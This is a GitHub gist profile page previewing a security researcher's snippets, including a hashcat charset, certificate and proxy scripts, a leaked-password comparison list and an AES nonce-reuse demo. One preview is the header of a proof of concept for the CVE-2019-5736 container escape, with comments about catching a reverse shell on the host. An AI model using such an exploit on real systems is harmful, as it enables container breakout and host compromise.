Skip to content

Instantly share code, notes, and snippets.

View singe's full-sized avatar

Dominic White singe

271 followers · 0 following
View GitHub Profile
@singe
singe / sources.md
Last active September 28, 2020 10:59
Richard Serra & Carlota Fay Schoolman's "Television Delivers People" from March 1973
@singe
singe / README.md
Last active March 19, 2022 03:15
Windows Arabic Code Page (1265) for hashcat

A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.

@singe
singe / Dockerfile
Last active May 29, 2020 19:49
Simple canary token binary wrapper
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@singe
singe / create_certs.sh
Last active November 18, 2022 20:22
A simple tshark EAP certificate extractor
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / cve-2019-5736.py
Last active April 30, 2023 06:18
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / xe.sh
Created May 8, 2018 13:11
A super simple script to pull currency info from xe.com
#!/bin/sh
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
url="https://www.xe.com/currencyconverter/convert/"
amount="$1"
fromcur="$2"
tocur="$3"
if [ "$fromcur" == "" ]; then #Use default currencies
fromcur="ZAR"
tocur="GBP"
fi
@singe
singe / allowed.txt
Last active May 28, 2019 06:07
LinkedIn Top 10k Passwords Compared to Twitter Password Blacklist
123456789:allowed
linkedin:allowed
000000:allowed
linked:allowed
1234567890:allowed
222222:allowed
555555:allowed
pakistan:allowed
chocolate:allowed
Linkedin:allowed
@singe
singe / docker-for-mac-linuxkit-build.sh
Created March 14, 2018 21:01
A simple script to rebuild the linuxkit image used in Docker for Mac.
git clone https://github.com/linuxkit/linuxkit
cd linuxkit
currdir=$(pwd)
make
export PATH=$PATH:$currdir/bin
foo=$(grep isoEfi\ $currdir/src/cmd/linuxkit/vendor/github.com/moby/tool/src/moby/output.go|cut -d\" -f2)
docker pull $foo
cd examples
linuxkit build --format iso-efi docker-for-mac.yml
mv /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso.orig
@singe
singe / request-proxy-facebook.py
Last active October 1, 2022 23:30
Simple Python requests to browser reverse proxy example.
#!/usr/bin/env python3
# A simple demo of Python requests to reverse proxy
# It's an intermediate between vanilla requests and Selenium
# It let's you interact programatically, but still run JS in
# the browser, without Selenium overhead
#
# This is an example of automating aspects of Facebook
#
# by @singe
@singe
singe / aes-ccm-noncense.py
Created October 18, 2017 18:58
Simple demonstration of how you can recover plaintext from a stream cipher when the nonce is reused.
#!/usr/bin/env python3
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
pairwiseTransientKey = b'pairwiseTransKey'
EAPOLheader = b'Unencrypted Frame Stuff'
plaintext1 = b'Attack at dawn'
nonce1 = get_random_bytes(11)